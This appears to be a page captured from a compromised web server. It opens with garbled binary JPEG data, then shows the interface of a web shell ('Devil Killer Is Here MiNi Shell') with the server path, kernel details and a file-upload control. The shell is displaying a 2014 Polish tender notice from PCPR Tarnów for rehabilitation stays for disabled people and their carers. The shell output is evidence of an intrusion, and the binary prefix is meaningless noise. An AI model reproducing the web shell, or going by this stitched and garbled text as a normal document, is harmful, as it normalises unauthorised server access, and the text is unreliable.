JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140530/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140530/116829-N-2014.html

<p class="kh_header"><b>Tarnów: Turnusy rehabilitacyjne dla osób niepełnosprawnych i ich opiekunów</b><br>
<b>Numer ogłoszenia: 116829 - 2014; data zamieszczenia: 30.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Szujskiego 66, 33-100 Tarnów, woj. małopolskie, tel. 14 621 56 83, faks 14 688 91 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcprtarnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna administracji samorządowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Turnusy rehabilitacyjne dla osób niepełnosprawnych i ich opiekunów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest kompleksowa organizacja 14-dniowych turnusów rehabilitacyjnych usprawniająco-rekreacyjnych dla trzech grup osób niepełnosprawnych wraz z opiekunami - łącznie 130 osób tj. 67 osób niepełnosprawnych oraz 63 opiekunów.
Przedmiot zamówienia podzielony został na następujące Zadania (części):

Zadanie A: Usługa turnusu dla grupy 1 -  Morze Bałtyckie
Zadanie B: Usługa turnusu dla grupy 2 - Jezioro
Zadanie C: Usługa turnusu dla grupy 3 - Sudety

Zamówienie jest współfinansowane ze środków PFRON oraz ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Program Operacyjny Kapitał Ludzki: Priorytet VII. Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie. Tytuł projektu: ,,Twój los w twoich rękach,,.


2.	Szczegółowe wymagania Zamawiającego wobec Wykonawcy w ramach realizacji każdego 
z Zadań (każdej z części) niniejszego zamówienia:

1)	Zamawiający dopuszcza składanie ofert częściowych w podziale na w/w Zadania. W załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia określono schorzenia osób w podziale na poszczególne części (zadania). Wykonawca realizując turnus musi uwzględnić specyfikę schorzeń opisanych w tym załączniku.

2)	Wykonawca zobowiązany jest zrealizować turnus zgodnie z  ustawą z dnia 27 sierpnia 1997r. 
o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych  
(Dz. U. z 2011 r., Nr 127, poz. 721, z późn. zm.) oraz rozporządzeniem Ministra Pracy i Polityki Społecznej w sprawie turnusów rehabilitacyjnych z dnia 15 listopada 2007 r.  
(Dz. U. z 2007 r., Nr 230, poz.1694). 

3)	Miejsce realizacji turnusu:

a)	Dla części I (Zadanie A) w ośrodku zlokalizowanym: w odległości do 200 m od plaży nadmorskiej 
przy czym droga ta musi być utwardzona i wyrównana. 

b)	Dla części II (Zadanie B) w Ośrodek musi być usytuowany nad jeziorem lub innym zbiornikiem wodnym mogącym pełnić funkcję kąpieliska w odległości do 5 godzin jazdy autobusem licząc od siedziby Powiatowego Centrum Powiatowego w Tarnowie. W bezpośrednim sąsiedztwie jeziora/kąpieliska musi znajdować się piaszczysta plaża z wydzieloną strzeżoną strefą 
i wykwalifikowaną opieką ratowniczą. Jezioro/Kąpielisko musi być nie mniejsze niż 
20 hektarów i być dopuszczone do użytku przez odpowiednie służby sanitarne. Wymaga się by ośrodek był oddalony od jeziora/kąpieliska o nie więcej niż 1300m. Jeśli Wykonawca zaoferuje realizację turnusu w ośrodku oddalonym o więcej niż 350 m. od jeziora/kąpieliska to będzie on zobligowany do zapewniania również transportu dla uczestników co najmniej raz dziennie do miejsca kąpielowego i z powrotem. O godzinie wyjazdu i powrotu będzie decydować opiekun grupy 
w porozumieniu z uczestnikami.

c)	Dla części III (Zadane C) na terenie województwa dolnośląskiego w powiecie graniczącym z pasmem gór Sudetów.


4)	Wykonawca zorganizuje na swój koszt i we własnym zakresie w okresie trwania turnusu co najmniej jedną wycieczkę w trakcie której uczestnicy będą mogli zwiedzać atrakcje przyrodnicze i/lub historyczne.  W ramach każdej wycieczki Wykonawca zapewni osobę odpowiedzialną za organizację i opiekę towarzyszącą grupie uczestników od momentu opuszczenia ośrodka, aż po powrót. 

5)	Wykonawca zorganizuje w czasie wolnym zajęcia kulturalno - oświatowe i sportowo-rekreacyjne 
(w tym wieczorki muzyczne/taneczne).

6)	Ośrodek, w którym Wykonawca będzie realizował przedmiot zamówienia musi być ośrodkiem przystosowanym do realizacji turnusu z uwzględnieniem wszystkich schorzeń uczestników tego turnusu wyszczególnionych w załączniku nr 1 do SIWZ w ramach realizowanego Zadania (części).  Ośrodek musi posiadać wpis do rejestru ośrodków o którym mowa w rozporządzeniu Ministra Pracy 
i Polityki Społecznej w sprawie turnusów rehabilitacyjnych z dnia 15 listopada 2007 r. 
(Dz. U. z 2007 r., Nr 230, poz.1694). Wykonawca przekaże oryginał lub kserokopię potwierdzoną przez siebie za zgodność z oryginałem dokumentu potwierdzającego, że zaoferowany ośrodek poosiada wymagany przepisami wpis najpóźniej wraz dniem przekazania programu o którym mowa 
w punkcie 12.

7)	Turnus musi zostać tak zorganizowany by jego uczestnicy byli zgrupowani w jednym budynku ośrodka. 

8)	Wykonawca jest zobowiązany zapewnić wykwalifikowaną kadrę rehabilitantów i fizjoterapeutów gwarantującą prawidłową realizację programów turnusu (zabiegi, ćwiczenia realizowane przez osoby posiadające uprawnienia do wykonywania zawodu). Wykonawca zapewni ponadto opiekuna odpowiedzialnego za koordynację grupy na turnusie w zakresie obsługi kulturalno - oświatowej. Zaleca się by rolę opiekuna przez cały okres realizacji turnusu pełniła ta sama osoba. Opiekun musi przejąć grupę uczestników niezwłocznie po jej przybyciu na teren ośrodka. 

9)	Wykonawca musi przeprowadzić w ramach realizacji przedmiotu zamówienia badania lekarskie na początku i na końcu turnusu dla każdego z uczestników. W przypadku konieczności przewozu uczestnika do szpitala w trakcie trwania turnusu, uwzględni to w ramach  organizowanego turnusu oraz bezpłatnie zapewni konieczną opieka pielęgniarską lub lekarską. 

10)	W ramach turnusu wykonawca zorganizuje co najmniej 3 zabiegi dziennie przez minimum 10 dni zabiegowych dla każdej osoby niepełnosprawnej według wskazań lekarza dostosowanych do rodzaju schorzeń i dysfunkcji. Zabiegi będą realizowane na terenie ośrodka, w którym zakwaterowani będą uczestnicy turnusu. Ośrodek musi mieć możliwość realizacji  dla uczestników zabiegów suchych 
i wodnych.


11)	Turnus zostanie zrealizowany dla następującej liczby uczestników i opiekunów

a)	Zadanie A:  Liczba uczestników 42 opiekunów 40
b)	Zadanie B:  Liczba uczestników 17, opiekunów 15
c)	Zadanie C:  Liczba uczestników 8 opiekunów 8

12)	Zadaniem opiekunów oddelegowanych przez Zamawiającego jest wyłącznie opieka i nadzór nad uczestnikami turnusów. Wykonawca nie może zobowiązywać tych opiekunów do innych zadań, zwłaszcza niedopuszczalne jest powierzenie im organizacji turnusów, wyżywienia i noclegów, powierzenie roli przewodnika. 

13)	Wyżywienie, w ramach turnusu Wykonawca jest zobowiązany zapewnić dla wszystkich uczestników oraz opiekunów oddelegowanych przez Zamawiającego. Posiłki muszą być wydawane na terenie ośrodka rehabilitacyjno-rekreacyjnego, który Wykonawca zaproponuje w złożonej ofercie. Wymaga się od Wykonawcy minimum 3 posiłków dziennie; śniadanie, kolacja - podawana w formie szwedzkiego stołu, natomiast obiad dwudaniowy wyporcjowany, plus deser.  Posiłki muszą zostać przygotowane i podane z zachowaniem wszelkich przepisów dotyczący higieny żywienia i żywności. Ponadto w dniu powrotu Wykonawca przed rozpoczęciem podróży wręczy każdemu uczestnikowi oraz ich opiekunom suchy prowiant na czas podróży.

14)	W przypadku osób wymagających zastosowania specjalistycznej diety Wykonawca zagwarantuje zbilansowane, urozmaicone posiłki dostosowanych do rodzaju schorzenia.

15)	 Wykonawca zobowiązuje się zapewnić ubezpieczenie wszystkich uczestników turnusu oraz opiekunów oddelegowanych przez Zamawiającego na czas trwania turnusu od następstw nieszczęśliwych wypadków na kwotę min. 20.000 zł za osobę. Wykonawca musi posiadać polisę potwierdzającą objęcie uczestników takim ubezpieczeniem oraz przedstawić jej kserokopię przed rozpoczęciem wyjazdu.

16)	 Wykonawca zobowiązany jest do pełnego zorganizowania turnusu, (za wyjątkiem transportu do miejsca jego realizacji oraz transportu powrotnego, który zapewnia Zamawiający), w tym także do kontaktu z organizatorami, przedstawicielami oraz innymi właściwymi osobami dla miejsc gdzie będą one realizowane w celu ustalenia szczegółów przyjazdu, zapewnienia noclegów, zapewnienia wyżywienia, badań, organizacji zabezpieczeń i wszelkich innych rzeczy niezbędnych do przeprowadzenia turnusu.

17)	Wymaga się by pomieszczenia ogólnodostępne, z których korzystać będą uczestnicy tj. 
co najmniej stołówka, baza rekreacyjna, baza zabiegowa były dostosowane do potrzeb osób poruszających się na wózkach inwalidzkich (np. winda, podjazd).

18)	Zaleca się by teren ośrodka był bezpieczny, ogrodzony i dostosowany do potrzeb osób niepełnosprawnych poruszających się na wózkach inwalidzkich.

19)	Wykonawca zakwateruje uczestników turnusu w jednym obiekcie, w pokojach dwuosobowych lub/i trzyosobowych, z pełnym węzłem sanitarnym zlokalizowanych na parterze lub/i I piętrze wyposażonych w: telewizor z pilotem, czajnik bezprzewodowy, ręczniki kąpielowe. Niedopuszczalne jest kwaterowanie w pokojach innych osób niż uczestników turnusu i ich opiekunów.

20)	Zaleca się by pokoje i łazienki wyposażone były w rozwiązania architektoniczne dostosowane do rodzaju niepełnosprawności. 

21)	Wykonawca zapewnia całodobową opiekę pielęgniarską oraz lekarską (lekarz i pielęgniarka na stałe przebywający w ośrodku).

22)	 Zamawiający zastrzega sobie możliwość zmniejszenia ilości uczestników lub opiekunów - maksymalnie o 8 osób dla Zadania A, o 4 osoby dla Zadania b oraz 3 osoby dla Zadania C. O takiej zmianie Zamawiający powiadomi Wykonawcę pisemnie, pocztą elektroniczną lub faksem najpóźniej 
3 dni przed wyjazdem. Wykonawcy nie przysługują żadne roszczenia z uwagi na wprowadzone przez Zamawiającego zmniejszenia.

23)	Wykonawca jest zobowiązany prowadzić odpowiednią dokumentację w postaci pisemnego sprawozdania zawierającego szczegółowy opis realizacji turnusu. Wykonawca będzie prowadził także dokumentacje w postaci zdjęć podczas realizacji turnusu, formie zapisu cyfrowego na płycie CD. Wymagana ilość zdjęć co najmniej 5 każdego dnia.

24)	Wykonawca przekaże Zamawiającemu szczegółowy program każdego turnusu najpóźniej 5 dni roboczych przed planowanym rozpoczęciem turnusu. Program taki musi zawierać co najmniej informacje o planowanych dniach rozpoczęcia turnusu, zalecanych godzinach przyjazdu i wyjazdu, 
o miejscach, w które udadzą się uczestnicy, miejscu noclegowym, o osobie wyszczególnionej z imienia i nazwiska pełniącej rolę opiekuna, o którym mowa w punkcie 8 oraz innych informacjach istotnych 
z punktu widzenia realizacji umowy. Zamawiający dopuszcza możliwość wyrażenia zgody na wprowadzenie zmiany w złożonym harmonogramie na uzasadniony, pisemny wniosek Wykonawcy. Dokonana zmiana nie prowadzi do zmiany zawartej umowy.

25)	Zamawiający dokona płatności na podstawie faktur (rachunków) po zakończeniu realizacji turnusu. Podstawą do wystawienia faktur (rachunków) jest przekazanie dokumentacji, o której mowa 
w pkt. 23. Przekazanie dokumentacji Zamawiającemu winno nastąpić w ciągu 5 dni roboczych od dnia zakończenia turnusu (wyjazdu).

26)	W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do: 
a)	informowania uczestników turnusu i ich opiekunów o fakcie współfinansowania turnusów ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
b)	stosowania na wszystkich dokumentach w trakcie wykonywania przedmiotowego zamówienia znaków takich jak: logo POKL, logo Unii Europejskiej wraz z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, logo projektu, logo powiatu PCPR w Tarnowie, hasło promocyjne POKL.
c)	Oznakowanie  miejsc, z których korzystać będą uczestnicy turnusu poprzez umieszczenie plakatów informacyjnych dotyczących projektu, które Wykonawca otrzyma od Zamawiającego po podpisaniu umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 85.00.00.00-9, 85.14.00.00-2, 85.14.21.00-7, 92.33.00.00-3, 63.50.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada: wpis do rejestru organizatorów turnusów rehabilitacyjnych określony w § 9-11 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 15 listopada 2007 r. w sprawie turnusów rehabilitacyjnych (Dz. U. Nr 230, poz 1694.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał minimum 2 usługi polegające na organizacji turnusów rehabilitacyjnych grup conajmniej 15 osobowych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Atrakcyjność - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcprtarnow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Tarnowie (pokój nr 413) 
ul. Szujskiego 66,
 33-100 Tarnów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2014 godzina 09:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Tarnowie (piętro IV, pokój numer 417) 
ul. Szujskiego 66,
33-100 Tarnów..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: Twój los w Twoich rękach. Projekt w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII. Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie. Projekt jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie A: Usługa turnusu dla grupy 1 -  Morze Bałtyckie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 14-dniowy turnus rehabilitacyjny usprawniająco-rekreacyjny nad Morzem Bałtyckim dla 42 uczestników oraz 40 opiekunów. Szczegółowe wymagania określono w Specyfikacji Istotnych Warunków Zamówienia oraz w załączniku nr 1 do tej specyfikacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 85.00.00.00-9, 85.14.00.00-2, 85.14.21.00-7, 92.33.00.00-3, 63.50.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Atrakcyjność - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie B: Usługa turnusu dla grupy 2 - Jezioro.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 14-dniowy turnus rehabilitacyjny usprawniająco-rekreacyjny w pobliżu jeziora lub innego zbiornika mogącego pełnić funkcję kąpieliska dla 17 uczestników oraz 15 opiekunów. Szczegółowe wymagania określono w Specyfikacji Istotnych Warunków Zamówienia oraz w załączniku nr 1 do tej specyfikacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 85.00.00.00-9, 85.14.00.00-2, 85.14.21.00-7, 92.33.00.00-3, 63.50.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Atrakcyjność - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie C: Usługa turnusu dla grupy 3 - Sudety.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 14-dniowy turnus rehabilitacyjny usprawniająco-rekreacyjny na terenie woj. dolnośląskiego w powiecie graniczącym z pasmem gór Sudetów dla 8 uczestników oraz 8 opiekunów. Szczegółowe wymagania określono w Specyfikacji Istotnych Warunków Zamówienia oraz w załączniku nr 1 do tej specyfikacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 85.00.00.00-9, 85.14.00.00-2, 85.14.21.00-7, 92.33.00.00-3, 63.50.00.00-4.</p></li>
